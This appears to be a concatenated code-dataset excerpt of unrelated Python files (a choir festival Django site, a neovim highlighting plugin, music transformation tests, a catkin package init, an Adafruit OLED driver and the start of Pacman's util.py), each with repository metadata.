'The ' + EVENT_ANNIVERSARY + ' AIVCF will take place in ' + EVENT_CITY + ' in ' + EVENT_YEAR + '.',
'Out of courtesy to the upcoming festivals (68th in Perth 2017, 69th in Melbourne 2018), we won’t have any news until Melbourne 2018 has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.',
],
}
return render(request,'public/index.html', context)
def event(request):
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'event',
'titletext': 'About ' + EVENT_MEDIUM_NAME,
'text1': [
'Intervarsity choral festivals (IVs) have been an annual event since 1950 when the Melbourne University Choral Society travelled to Sydney to present a combined concert with the Sydney University Musical Society. IVs quickly expanded to include other university choirs and are now hosted in many cities across Australia with participation drawing from the wider choral community in Australia and occasionally overseas.',
EVENT_YEAR + ' sees the ' + EVENT_ANNIVERSARY + ' IV, hosted in ' + EVENT_CITY + ' by ' + EVENT_HOSTED_BY + '. Choristers from across the country will be in ' + EVENT_CITY + ' for intensive rehearsals to produce a grand concert.',
'Out of courtesy to the upcoming festivals (' + EVENT_UPCOMING_EVENTS + '), we won’t have any news until ' + EVENT_PRIOR_CITY + ' ' + EVENT_PRIOR_YEAR + ' has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.',
ORGANISATION_SHORT_NAME + ' acknowledges that ' + EVENT_SHORT_NAME + ' is being held on the traditional lands of the ' + EVENT_ABORIGINAL_COUNTRY + ' people; we pay respect to the elders of the community and extend our recognition to their descendants.',
],
'titletext2': 'Past ' + EVENT_CITY + ' IVs'
}
return render(request,'public/event.html', context)
def organisation(request):
context = {
'imagesource': 'public/images/image-1.jpg',
'activetab': 'organisation',
'titletext': ORGANISATION_SHORT_NAME,
'text1': [
'The ' + EVENT_ANNIVERSARY + ' Australian Intervarsity Choral Festival is presented by ' + ORGANISATION_SHORT_NAME + ' in ' + EVENT_YEAR + '. The organisation was elected by the members of ' + EVENT_HOSTED_BY + '.',
'We represent the ' + EVENT_CITY + ' contingent of a wider choral community across Australia with combined membership of over a thousand nationally in the Australian Intervarsity Choral Societies Association (AICSA).',
]
}
return render(request,'public/index.html', context)
def participate(request):
context = {
'imagesource': 'public/images/image-2.jpg',
'activetab': 'participate',
'titletext': 'Participate',
}
return render(request,'public/participateindex.html', context)
def participatefundraising(request):
context = {
'imagesource': 'public/images/image-2.jpg',
'activetab': 'participate',
'titletext': 'Participate: Fundraising',
}
return render(request,'public/participatefundraisingindex.html', context)
def help(request):
context = {
'titletext': 'Help',
}
return render(request,'public/help.html', context)
def privacy(request):
context = {
'titletext': 'Privacy policy',
}
return render(request,'public/help.html', context)
def privacyaffiliates(request):
context = {
'titletext': 'Affiliates',
}
return render(request,'public/help.html', context)
def conduct(request):
context = {
'titletext': 'Code of conduct',
}
return render(request,'public/help.html', context)
|
amoschou/openiv
|
public/views.py
|
Python
|
mpl-2.0
| 3,942 | 0.011935 |
import neovim
# TODO figure out the python way to do these imports, this is probably wrong
import pygments
import pygments.lexers
import pygments.token
@neovim.plugin
class Neosyntax(object):
def __init__(self, nvim):
self.nvim = nvim
# swap src_ids. from brefdl: allocate two ids, and swap, adding before clearing, so things that don't change won't appear to flicker
self.srcset = True
self.pygmap = {}
t = pygments.token
self.pygmap[t.Comment.Hashbang] = "Comment"
self.pygmap[t.Comment.Single] = "Comment"
self.pygmap[t.Comment] = "Comment" # older versions of pygments don't have Single and Hashbang?
self.pygmap[t.Keyword.Namespace] = "Include"
self.pygmap[t.Keyword] = "Conditional"
self.pygmap[t.Literal.Number.Integer] = "Number"
self.pygmap[t.Literal.String.Double] = "String"
self.pygmap[t.Literal.String.Single] = "String"
self.pygmap[t.Literal.String] = "String" # same comment as above
self.pygmap[t.Name.Builtin.Pseudo] = "Boolean"
self.pygmap[t.Name.Builtin] = "Function"
self.pygmap[t.Name.Decorator] = "PreProc"
self.pygmap[t.Operator.Word] = "Conditional"
def msg(self, m):
self.nvim.command("echom '" + str(m) + "'")
@neovim.autocmd('BufEnter', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler1(self, bufnr): # TODO how to pass in multiple arguments?
self.highlight_buffer(int(bufnr))
@neovim.autocmd('TextChanged', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler2(self, bufnr):
self.highlight_buffer(int(bufnr))
@neovim.autocmd('TextChangedI', pattern='*', eval='expand("<abuf>")', sync=False)
def autocmd_handler3(self, bufnr):
# TODO do special thing here if the user is currently typing inside a string or comment
# to extend that highlight group a bunch of columns ahead
# not sure where the best place to implement that will be
# TODO I was hoping that performance with syntax highlighting being done by this autocmd
# would be comparable to plain old :syntax off and without this plugin
# I think it is better, although I'll have to find a way to test that empirically
# But, it still isn't as good as I hoped. Some flickering is still present
# This may be a limitation of the tui and its ability to process remote api calls
# Maybe this will work better in the eventual gui?
# If nothing else, this function gives the option to have syntax highlighting turned off during
# insert mode, then handled once you leave insert mode. Just have to remove the TextChangedI autocmd
# and keep the TextChanged one (no I).
# This is less than ideal for lots of situations, but is better than nothing
# TODO figure out a way to queue these calls somehow? with the swapping src_id strategy,
# flicker is gone when typing fast in insert mode, but typing too fast can still cause a
# call backlog that can either crash the python host or just appear as lots of lag to the user
# a timer? when this is called, start a timer that counts down from X seconds
# throw away and subsequent calls that come in before the tmier is up
# maybe highlight_buffer should take lines as an argument to facilitate the viewport shit?
self.highlight_buffer(int(bufnr))
@neovim.function('UnHighlightBuffer', sync=False)
def unhighlight_buffer(self, bufnr):
bufnr = int(bufnr)
for b in self.nvim.buffers:
if b.number == bufnr: # TODO what if it isn't found?
buf = b
break
end = len([line for line in buf])
buf.clear_highlight(src_id=1, line_start=0, line_end=end, async=True)
buf.clear_highlight(src_id=2, line_start=0, line_end=end, async=True)
@neovim.function('HighlightBuffer', sync=False)
def highlight_buffer(self, bufnr):
# XXX some ideas to help with flickering:
# use cursorholdi instead of textchangedi
# still use textchangedi, but also use a timer, and if the highlight is less than X seconds old, don't recompute, just return
# in insert mode, only recompute highlight groups on the line, or couple of lines surrounding the cursor
# get the viewport of the current window, render that region only or first before the rest of the buffer
# also, should cache a map of buffer -> lexer so this doesn't have to be done every time
for b in self.nvim.buffers:
if b.number == bufnr: # TODO what if it isn't found?
buf = b
break
# TODO - can I be more intelligent than doing the whole buffer every time? just the area around a change?
fullbuf = "\n".join([line for line in buf]) # TODO can i cache this somehow?
self.msg(fullbuf)
mylexer = pygments.lexers.guess_lexer(fullbuf) # TODO cache this
# TODO these numbers need to be per buffer
addid = 1 if self.srcset else 2
rmid = 2 if self.srcset else 1
self.srcset = not self.srcset
arglist = []
linenum = 0
lastnewlineindex = -1
for (index, tokentype, value) in mylexer.get_tokens_unprocessed(fullbuf):
self.msg("line: " + str(linenum))
self.msg("idx : " + str(index))
self.msg("lni : " + str(lastnewlineindex))
self.msg("tok : " + str(tokentype))
self.msg("val : " + str(value))
self.msg("--------")
# XXX issue with highlight groups
# if `:syntax off` is set from vimrc, which is the entire goal of this plugin
# then a lot (maybe all) of the language specific highlight groups will never be loaded
# e.g., the "Comment" highlight group will probably exist (assuming the colorscheme
# defines it), but "pythonComment" will not.
# This isn't great, because I want to maintain the ability of users to modify individual
# language highlight groups if they feel like it
# I am not going to worry about this just yet, but I will need to find a way to address this eventually
# For now, my solution is to just not use those language specific groups while I get the basics working
# Also, it would be really swell if I didn't have to write this code for every single languages someone
# might edit in vim. Actually, that's really the only way to do it.
# I need to make the core functionality as generic as possible, while having an easy way to override settings
# for a specific language if the generic way just won't work in all edge cases
# This should be possible both within this python code, and from vimscript
# entire file is sent to pygments in a single big list, so column indexes are relative to the entire file, not per line
# keep track of the last index where a newline was found
# the index for the 0th column for the next line will be 1 after the lastnewlineindex
# at the same time, also track line numbers
# TODO newlines are their own tokens in python, but not in bash, and probably other languages
# I assume any language where newlines don't have semantic meaning won't have them as tokens
# need to find a better way to keep track of line numbers
# shit.
# so i can either override each lexer that doesn't have newlines as tokens, see here:
# http://pygments.org/docs/lexerdevelopment/#modifying-token-streams
# or, note down the byte index of newlines in the fullbuf stream and work with that
# first method might be marginally faster, but is so ugly it makes me want to cry
# probably will go with second method.
if value == '\n':
linenum += 1
lastnewlineindex = index
# self.msg('found newline')
elif tokentype in self.pygmap:
colstart = index - (lastnewlineindex + 1)
# precompute all the add_highlight calls to be made
arglist.append({'hl_group': self.pygmap[tokentype], 'line': linenum, 'col_start': colstart, 'col_end': colstart+len(value), 'src_id': addid, 'async': True})
# done computing, make the calls
for arg in arglist:
buf.add_highlight(**arg)
# clear old highlighting
buf.clear_highlight(src_id=rmid, line_start=0, line_end=len(fullbuf), async=True)
|
jebaum/neosyntax
|
rplugin/python3/neosyntax.py
|
Python
|
gpl-3.0
| 8,728 | 0.007218 |
import unittest
import logging
from harmoniccontext.harmonic_context import HarmonicContext
from harmoniccontext.harmonic_context_track import HarmonicContextTrack
from harmonicmodel.secondary_chord_template import SecondaryChordTemplate
from harmonicmodel.tertian_chord_template import TertianChordTemplate
from structure.LineGrammar.core.line_grammar_executor import LineGrammarExecutor
from structure.line import Line
from structure.note import Note
from timemodel.duration import Duration
from tonalmodel.diatonic_foundation import DiatonicFoundation
from tonalmodel.modality import ModalityType
from tonalmodel.tonality import Tonality
from transformation.reflection.t_chromatic_reflection import TChromaticReflection
from misc.interval import Interval
from tonalmodel.diatonic_pitch import DiatonicPitch
from fractions import Fraction
class TestTChromaticFlip(unittest.TestCase):
logging.basicConfig(level=logging.DEBUG)
def setUp(self):
pass
def tearDown(self):
pass
def test_hct_rebuild_perfect_overlap(self):
print('----- test_hct_rebuild_perfect_overlap -----')
line_str = '{<C-Major: I> hA:5 <:IV> B qC G <:VI> hD}'
lge = LineGrammarExecutor()
target_line, target_hct = lge.parse(line_str)
print('--- before transformation ---')
TestTChromaticFlip.print_notes(target_line)
TestTChromaticFlip.print_hct(target_hct)
cue = DiatonicPitch(5, 'c')
f = TChromaticReflection(target_line, target_hct, cue)
temporal_extent = Interval(Fraction(1, 2), Fraction(3, 2))
score_line, score_hct = f.apply(temporal_extent, cue)
print('--- after transformation ---')
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
print('--- transformation ---')
TestTChromaticFlip.print_function(f, target_hct)
notes = score_line.get_all_notes()
assert 'Db:4' == str(notes[1].diatonic_pitch)
assert 'C:5' == str(notes[2].diatonic_pitch)
assert 'F:4' == str(notes[3].diatonic_pitch)
hc_list = score_hct.hc_list()
assert len(hc_list) == 3
assert hc_list[1].chord.chord_template.scale_degree == 1
assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'G', 'C', 'Eb'}
assert hc_list[1].chord.chord_template.inversion == 3
def test_mozart(self):
print('----- Mozart -----')
line_str = '{<C-Major: I> hC:5 qE G <:VMaj7> q@b:4 sC:5 D <:I> hC}'
lge = LineGrammarExecutor()
target_line, target_hct = lge.parse(line_str)
print('--- before transformation ---')
TestTChromaticFlip.print_notes(target_line)
TestTChromaticFlip.print_hct(target_hct)
cue = DiatonicPitch(5, 'c')
f = TChromaticReflection(target_line, target_hct, cue)
score_line, score_hct = f.apply()
print('--- after transformation ---')
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
print('--- transformation ---')
TestTChromaticFlip.print_function(f, target_hct)
notes = score_line.get_all_notes()
assert 'C:5' == str(notes[0].diatonic_pitch)
assert 'Ab:4' == str(notes[1].diatonic_pitch)
assert 'F:4' == str(notes[2].diatonic_pitch)
assert 'Db:5' == str(notes[3].diatonic_pitch)
assert 'C:5' == str(notes[4].diatonic_pitch)
assert 'Bb:4' == str(notes[5].diatonic_pitch)
assert 'C:5' == str(notes[6].diatonic_pitch)
hc_list = score_hct.hc_list()
assert len(hc_list) == 3
assert hc_list[0].chord.chord_template.scale_degree == 4
assert {t[0].diatonic_symbol for t in hc_list[0].chord.tones} == {'C', 'F', 'Ab'}
assert hc_list[0].chord.chord_template.inversion == 3
assert hc_list[1].chord.chord_template.scale_degree == 7
assert {t[0].diatonic_symbol for t in hc_list[1].chord.tones} == {'F', 'Bb', 'Db', 'Gb'}
assert hc_list[1].chord.chord_template.inversion == 3
assert hc_list[2].chord.chord_template.scale_degree == 4
assert {t[0].diatonic_symbol for t in hc_list[2].chord.tones} == {'C', 'F', 'Ab'}
assert hc_list[2].chord.chord_template.inversion == 3
def test_secondary_chord(self):
print('----- test_secondary_tonality -----')
diatonic_tonality = Tonality.create(ModalityType.Major, DiatonicFoundation.get_tone("C"))
chort_t_i = TertianChordTemplate.parse('tI')
chord_i = chort_t_i.create_chord(diatonic_tonality)
chord_v_ii = SecondaryChordTemplate.parse('V/ii').create_chord(diatonic_tonality)
chord_vi_v = SecondaryChordTemplate.parse('vi/V').create_chord(diatonic_tonality)
chord_t_ii = TertianChordTemplate.parse('tii')
chord_ii = chord_t_ii.create_chord(diatonic_tonality)
hc_track = HarmonicContextTrack()
hc_track.append(HarmonicContext(diatonic_tonality, chord_i, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_v_ii, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_vi_v, Duration(1)))
hc_track.append(HarmonicContext(diatonic_tonality, chord_ii, Duration(1)))
TestTChromaticFlip.print_hct(hc_track)
tune = [('C:5', (1, 1)), ('E:5', (1, 1)), ('E:5', (1, 1)), ('G:5', (1, 1))]
line = TestTChromaticFlip.build_line(tune)
cue = DiatonicPitch(5, 'd')
tflip = TChromaticReflection(line, hc_track, cue)
temporal_extent = Interval(Fraction(0), Fraction(4))
score_line, score_hct = tflip.apply()
TestTChromaticFlip.print_notes(score_line)
TestTChromaticFlip.print_hct(score_hct)
@staticmethod
def print_hct(hct):
hcs = hct.hc_list()
index = 0
for hc in hcs:
print('[{0}] {1} {2}'.format(index, hc, hc.position))
index += 1
print("--------")
@staticmethod
def print_notes(line):
for note in line.get_all_notes():
print(note)
print("--------")
@staticmethod
def print_map(f, source_hct, cue):
for hc in source_hct.hc_list():
if hc in f.hc_flip_map:
pitch_map = f.hc_flip_map[hc]
map_list = list()
for tone in pitch_map.domain_tonality.annotation[:-1]:
ft = pitch_map.tonal_function[tone]
map_list.append('{0}-->{1}'.format(tone.diatonic_symbol, ft.diatonic_symbol))
print('[{0}] ({1}) {2}'.format(hc, pitch_map.range_tonality, ', '.join([s for s in map_list])))
@staticmethod
def print_function(f, source_hct):
for hc in source_hct.hc_list():
if hc in f.hc_flip_map:
pitch_map = f.hc_flip_map[hc]
domain = sorted([p for p in pitch_map.domain], key=lambda p: p.chromatic_distance)
domain_tones = pitch_map.domain_tonality.annotation[:-1]
map_list = list()
for p in domain:
r = pitch_map[p]
if p.diatonic_tone in domain_tones:
map_list.append('{0} --> {1}'.format(p, r))
print('[{0}] ({1}) {2}: {3}'.format(pitch_map.domain_tonality,
pitch_map.cue_pitch,
pitch_map.range_tonality,
', '.join([s for s in map_list])
)
)
@staticmethod
def build_line(note_spec_list):
note_list = list()
for spec in note_spec_list:
pitch = DiatonicPitch.parse(spec[0])
n = Note(pitch, Duration(spec[1][0], spec[1][1]))
note_list.append(n)
return Line(note_list)
|
dpazel/music_rep
|
tests/transformation_tests/reflection_tests/test_t_chromatic_reflection.py
|
Python
|
mit
| 7,963 | 0.003014 |
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/rss-student/rss-2014-team-3/src/robotbrain/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
WeirdCoder/rss-2014-team-3
|
devel/lib/python2.7/dist-packages/robotbrain/__init__.py
|
Python
|
mit
| 1,010 | 0.00099 |
# Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import time
import Adafruit_GPIO as GPIO
import Adafruit_GPIO.SPI as SPI
# Constants
SSD1351_I2C_ADDRESS = 0x3C # 011110+SA0+RW - 0x3C or 0x3D
SSD1351_SETCONTRAST = 0x81
SSD1351_DISPLAYALLON_RESUME = 0xA4
SSD1351_DISPLAYALLON = 0xA5
SSD1351_NORMALDISPLAY = 0xA6
SSD1351_INVERTDISPLAY = 0xA7
SSD1351_DISPLAYOFF = 0xAE
SSD1351_DISPLAYON = 0xAF
SSD1351_SETDISPLAYOFFSET = 0xD3
SSD1351_SETCOMPINS = 0xDA
SSD1351_SETVCOMDETECT = 0xDB
SSD1351_SETDISPLAYCLOCKDIV = 0xD5
SSD1351_SETPRECHARGE = 0xD9
SSD1351_SETMULTIPLEX = 0xA8
SSD1351_SETLOWCOLUMN = 0x00
SSD1351_SETHIGHCOLUMN = 0x10
SSD1351_SETSTARTLINE = 0x40
SSD1351_MEMORYMODE = 0x20
SSD1351_COLUMNADDR = 0x21
SSD1351_PAGEADDR = 0x22
SSD1351_COMSCANINC = 0xC0
SSD1351_COMSCANDEC = 0xC8
SSD1351_SEGREMAP = 0xA0
SSD1351_CHARGEPUMP = 0x8D
SSD1351_EXTERNALVCC = 0x1
SSD1351_SWITCHCAPVCC = 0x2
# Scrolling constants
SSD1351_ACTIVATE_SCROLL = 0x2F
SSD1351_DEACTIVATE_SCROLL = 0x2E
SSD1351_SET_VERTICAL_SCROLL_AREA = 0xA3
SSD1351_RIGHT_HORIZONTAL_SCROLL = 0x26
SSD1351_LEFT_HORIZONTAL_SCROLL = 0x27
SSD1351_VERTICAL_AND_RIGHT_HORIZONTAL_SCROLL = 0x29
SSD1351_VERTICAL_AND_LEFT_HORIZONTAL_SCROLL = 0x2A
#? SSD1351_DELAYS_HWFILL (3)
#? SSD1351_DELAYS_HWLINE (1)
# SSD1351 Commands
SSD1351_SETCOLUMN = 0x15
SSD1351_SETROW = 0x75
SSD1351_WRITERAM = 0x5C
SSD1351_READRAM = 0x5D
SSD1351_SETREMAP = 0xA0
SSD1351_STARTLINE = 0xA1
SSD1351_DISPLAYOFFSET = 0xA2
SSD1351_DISPLAYALLOFF = 0xA4
SSD1351_DISPLAYALLON = 0xA5
SSD1351_NORMALDISPLAY = 0xA6
SSD1351_INVERTDISPLAY = 0xA7
SSD1351_FUNCTIONSELECT = 0xAB
SSD1351_DISPLAYOFF = 0xAE
SSD1351_DISPLAYON = 0xAF
SSD1351_PRECHARGE = 0xB1
SSD1351_DISPLAYENHANCE = 0xB2
SSD1351_CLOCKDIV = 0xB3
SSD1351_SETVSL = 0xB4
SSD1351_SETGPIO = 0xB5
SSD1351_PRECHARGE2 = 0xB6
SSD1351_SETGRAY = 0xB8
SSD1351_USELUT = 0xB9
SSD1351_PRECHARGELEVEL = 0xBB
SSD1351_VCOMH = 0xBE
SSD1351_CONTRASTABC = 0xC1
SSD1351_CONTRASTMASTER = 0xC7
SSD1351_MUXRATIO = 0xCA
SSD1351_COMMANDLOCK = 0xFD
SSD1351_HORIZSCROLL = 0x96
SSD1351_STOPSCROLL = 0x9E
SSD1351_STARTSCROLL = 0x9F
class SSD1351Base(object):
"""Base class for SSD1351-based OLED displays. Implementors should subclass
and provide an implementation for the _initialize function.
"""
def __init__(self, width, height, rst, dc=None, sclk=None, din=None, cs=None,
gpio=None, spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS,
i2c=None):
self._log = logging.getLogger('Adafruit_SSD1351.SSD1351Base')
self._spi = None
self._i2c = None
self.width = width
self.height = height
self._pages = height/8
self._buffer = [0]*(width*height)
# Default to platform GPIO if not provided.
self._gpio = gpio
if self._gpio is None:
self._gpio = GPIO.get_platform_gpio()
# Setup reset pin.
self._rst = rst
self._gpio.setup(self._rst, GPIO.OUT)
# Handle hardware SPI
if spi is not None:
self._log.debug('Using hardware SPI')
self._spi = spi
self._spi.set_clock_hz(8000000)
# Handle software SPI
elif sclk is not None and din is not None and cs is not None:
self._log.debug('Using software SPI')
self._spi = SPI.BitBang(self._gpio, sclk, din, None, cs)
# Handle hardware I2C
elif i2c is not None:
self._log.debug('Using hardware I2C with custom I2C provider.')
self._i2c = i2c.get_i2c_device(i2c_address)
else:
self._log.debug('Using hardware I2C with platform I2C provider.')
import Adafruit_GPIO.I2C as I2C
if i2c_bus is None:
self._i2c = I2C.get_i2c_device(i2c_address)
else:
self._i2c = I2C.get_i2c_device(i2c_address, busnum=i2c_bus)
# Initialize DC pin if using SPI.
if self._spi is not None:
if dc is None:
raise ValueError('DC pin must be provided when using SPI.')
self._dc = dc
self._gpio.setup(self._dc, GPIO.OUT)
def _initialize(self):
raise NotImplementedError
def command(self, c):
"""Send command byte to display."""
if self._spi is not None:
# SPI write.
self._gpio.set_low(self._dc)
self._spi.write([c])
else:
# I2C write.
control = 0x00 # Co = 0, DC = 0
self._i2c.write8(control, c)
def data(self, c):
"""Send byte of data to display."""
if self._spi is not None:
# SPI write.
self._gpio.set_high(self._dc)
self._spi.write([c])
else:
# I2C write.
control = 0x40 # Co = 0, DC = 0
self._i2c.write8(control, c)
def begin(self, vccstate=SSD1351_SWITCHCAPVCC):
"""Initialize display."""
# Save vcc state.
self._vccstate = vccstate
# Reset and initialize display.
self.reset()
self._initialize()
# Turn on the display.
self.command(SSD1351_DISPLAYON)
def reset(self):
"""Reset the display."""
# Set reset high for a millisecond.
self._gpio.set_high(self._rst)
time.sleep(0.001)
# Set reset low for 10 milliseconds.
self._gpio.set_low(self._rst)
time.sleep(0.010)
# Set reset high again.
self._gpio.set_high(self._rst)
def display(self):
"""Write display buffer to physical display."""
self.command(SSD1351_SETCOLUMN)
self.data(0) # Column start address. (0 = reset)
self.data(self.width-1) # Column end address.
self.command(SSD1351_SETROW)
self.data(0) # Page start address. (0 = reset)
self.data(self.height-1) # Page end address.
# Write buffer data.
if self._spi is not None:
# Set DC high for data.
self._gpio.set_high(self._dc)
# Write buffer.
self.command(SSD1351_WRITERAM)
self._spi.write(self._buffer)
else:
for i in range(0, len(self._buffer), 16):
control = 0x40 # Co = 0, DC = 0
self._i2c.writeList(control, self._buffer[i:i+16])
def image(self, image):
"""Set buffer to value of Python Imaging Library image. The image should
be in 1 bit mode and a size equal to the display size.
"""
# if image.mode != '1':
# raise ValueError('Image must be in mode 1.')
imwidth, imheight = image.size
if imwidth != self.width or imheight != self.height:
raise ValueError('Image must be same dimensions as display ({0}x{1}).' \
.format(self.width, self.height))
# Grab all the pixels from the image, faster than getpixel.
pix = image.load()
# Iterate through the memory pages
index = 0
for page in range(self.height):
# Iterate through all x axis columns.
for x in range(self.width):
# Set the bits for the column of pixels at the current position.
bits = 0
# Don't use range here as it's a bit slow
for bit in [0, 1, 2, 3, 4, 5, 6, 7]:
bits = bits << 1
bits |= 0 if pix[(x, page*8+7-bit)] == 0 else 1
# Update buffer byte and increment to next byte.
self._buffer[index] = bits
index += 1
def clear(self):
"""Clear contents of image buffer."""
self._buffer = [0]*(self.width*self.height)
def set_contrast(self, contrast):
"""Sets the contrast of the display. Contrast should be a value between
0 and 255."""
if contrast < 0 or contrast > 255:
raise ValueError('Contrast must be a value from 0 to 255 (inclusive).')
self.command(SSD1351_CONTRASTMASTER)
self.command(contrast)
def dim(self, dim):
"""Adjusts contrast to dim the display if dim is True, otherwise sets the
contrast to normal brightness if dim is False.
"""
# Assume dim display.
contrast = 0
# Adjust contrast based on VCC if not dimming.
if not dim:
if self._vccstate == SSD1351_EXTERNALVCC:
contrast = 0x9F
else:
contrast = 0xCF
def invert(self):
self.command(SSD1351_NORMALDISPLAY)
def rawfill(self, x, y, w, h, fillcolor):
if (x >= self.width) or (y >= self.height):
return
if y+h > self.height:
h = self.height-y-1
if x+w > self.width:
w = self.width-x-1
self.command(SSD1351_SETCOLUMN)
self.data(x)
self.data(x+w-1)
self.command(SSD1351_SETROW)
self.data(y)
self.data(y+h-1)
#fill!
self.command(SSD1351_WRITERAM)
for num in range (0, w*h):
self.data(fillcolor >> 8)
self.data(fillcolor)
def color565(self, r, g, b):
c = r >> 3
c <<= 6
c |= g >> 2
c <<= 5
c |= b >> 3
return c
def roughimage(self, image):
self.command(SSD1351_SETCOLUMN)
self.data(0)
self.data(self.width - 1)
self.command(SSD1351_SETROW)
self.data(0)
self.data(self.height-1)
#fill
im_width, im_height = image.size
print(im_width, im_height)
rgb_image = image.convert('RGB')
pix = rgb_image.load()
self.command(SSD1351_WRITERAM)
for row in range (0, im_height):
for column in range (0, im_width):
r,g,b = pix[column, row]
color = self.color565(r,g,b)
self.data( color >> 8)
self.data( color )
class SSD1351_128_96(SSD1351Base):
def __init__(self, rst, dc=None, sclk=None, din=None, cs=None, gpio=None,
spi=None, i2c_bus=None, i2c_address=SSD1351_I2C_ADDRESS,
i2c=None):
# Call base class constructor.
super(SSD1351_128_96, self).__init__(128, 96, rst, dc, sclk, din, cs,
gpio, spi, i2c_bus, i2c_address, i2c)
def _initialize(self):
# 128x96 pixel specific initialization.
# My version
self.command(SSD1351_COMMANDLOCK) # set command lock
self.data(0x12)
self.command(SSD1351_COMMANDLOCK) # set command lock
self.data(0xB1)
self.command(SSD1351_DISPLAYOFF) # 0xAE
self.command(SSD1351_CLOCKDIV) # 0xB3
self.command(0xF1) # 7:4 = Oscillator Frequency, 3:0 = CLK Div Ratio (A[3:0]+1 = 1..16)
self.command(SSD1351_MUXRATIO)
self.data(127)
self.command(SSD1351_SETREMAP)
self.data(0x74)
self.command(SSD1351_SETCOLUMN)
self.data(0x00)
self.data(0x7F)
self.command(SSD1351_SETROW)
self.data(0x00)
self.data(0x7F)
self.command(SSD1351_STARTLINE) # 0xA1
self.data(96)
self.command(SSD1351_DISPLAYOFFSET) # 0xA2
self.data(0x0)
self.command(SSD1351_SETGPIO)
self.data(0x00)
self.command(SSD1351_FUNCTIONSELECT)
self.data(0x01) #internal (diode drop)
self.command(SSD1351_PRECHARGE) # 0xB1
self.command(0x32)
self.command(SSD1351_VCOMH) # 0xBE
self.command(0x05)
self.command(SSD1351_NORMALDISPLAY) # 0xA6
self.command(SSD1351_CONTRASTABC)
self.data(0xC8)
self.data(0x80)
self.data(0xC8)
self.command(SSD1351_CONTRASTMASTER)
self.data(0x0F)
self.command(SSD1351_SETVSL)
self.data(0xA0)
self.data(0xB5)
self.data(0x55)
self.command(SSD1351_PRECHARGE2)
self.data(0x01)
|
twchad/Adafruit_Python_SSD1351
|
Adafruit_SSD1351/SSD1351.py
|
Python
|
mit
| 11,355 | 0.026244 |
# util.py
# -------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
import sys
import inspect
import heapq, random
import cStringIO
class FixedRandom:
def __init__(self):
fixedState = (3, (2147483648L, 507801126L, 683453281L, 310439348L, 2597246090L, \
2209084787L, 2267831527L, 979920060L, 3098657677L, 37650879L, 807947081L, 3974896263L, \
881243242L, 3100634921L, 1334775171L, 3965168385L, 746264660L, 4074750168L, 500078808L, \
776561771L, 702988163L, 1636311725L, 2559226045L, 157578202L, 2498342920L, 2794591496L, \
4130598723L, 496985844L, 2944563015L, 3731321600L, 3514814613L, 3362575829L, 3038768745L, \
2206497038L, 1108748846L, 1317460727L, 3134077628L, 988312410L, 1674063516L, 746456451L, \
3958482413L, 1857117812L, 708750586L, 1583423339L, 3466495450L, 1536929345L, 1137240525L, \
3875025632L, 2466137587L, 1235845595L, 4214575620L, 3792516855L, 657994358L, 1241843248L, \
1695651859L, 3678946666L, 1929922113L, 2351044952L, 2317810202L, 2039319015L, 460787996L, \
3654096216L, 4068721415L, 1814163703L, 2904112444L, 1386111013L, 574629867L, 2654529343L, \
3833135042L, 2725328455L, 552431551L, 4006991378L, 1331562057L, 3710134542L, 303171486L, \
1203231078L, 2670768975L, 54570816L, 2679609001L, 578983064L, 1271454725L, 3230871056L, \
2496832891L, 2944938195L, 1608828728L, 367886575L, 2544708204L, 103775539L, 1912402393L, \
1098482180L, 2738577070L, 3091646463L, 1505274463L, 2079416566L, 659100352L, 839995305L, \
1696257633L, 274389836L, 3973303017L, 671127655L, 1061109122L, 517486945L, 1379749962L, \
